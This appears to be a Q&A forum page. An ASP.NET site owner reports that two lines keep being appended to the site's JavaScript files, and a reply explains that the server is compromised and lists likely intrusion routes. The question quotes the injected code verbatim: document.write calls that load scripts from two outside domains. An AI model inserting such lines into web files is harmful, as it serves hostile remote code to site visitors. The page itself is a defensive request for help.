Home/ Questions/Q 464425
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-05-12T23:16:27+00:00

I need to know if there is any way of writing additional code to

  • 0

I need to know if there is any way of writing additional code to JavaScript files already deployed on the server.

I am facing a problem with an ASP.NET 2.0 website and it is related to the JavaScript files which I have on some of the pages. The problem is that when I upload the JavaScript files along with other files it works fine, but after sometime (one or two days) the JavaScript files get changed and two additional lines are added at the bottom of each of them. Those two lines are this:

document.write('<script src=http://kingsoftus.com/App_Code/tsx2.php ><\/script>');
document.write('<script src=http://eco-battery.co.uk/images/battguide.php ><\/script>');

This is causing my aspx pages to load something from these unknown urls. This thing causes errors and the aspx page does not get loaded or gets loaded with an error. I suspect there is something wrong on the server, but I need to know if there is any possibility that someone (virus or hacker) could just add these two lines to any JavaScript file on the server.

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    Saqib, another poster pointed out that your server his compromised. He’s right. He’s somehow able to inject JavaScript into your pages.

    There are many possibilities:

    1. Do you have anywhere where a user can insert text (a textbox, a dropdownlist, anything?) It doesn’t even have to allow them to insert text, since they can intercept the request and POST from somewhere other than the form).
    2. Do you properly encode everything that is sent to your database?
    3. Do you suffer from SQL injection issues?
    4. Have you changed your password recently?
    5. Do you use FTP (and not SFTP) for transferring files to your server?

    If you answered yes to any of these questions, that’s a potential hole. No, the problem is probably not with ASP.NET or IIS; it’s probably a hole in your code.

    • 0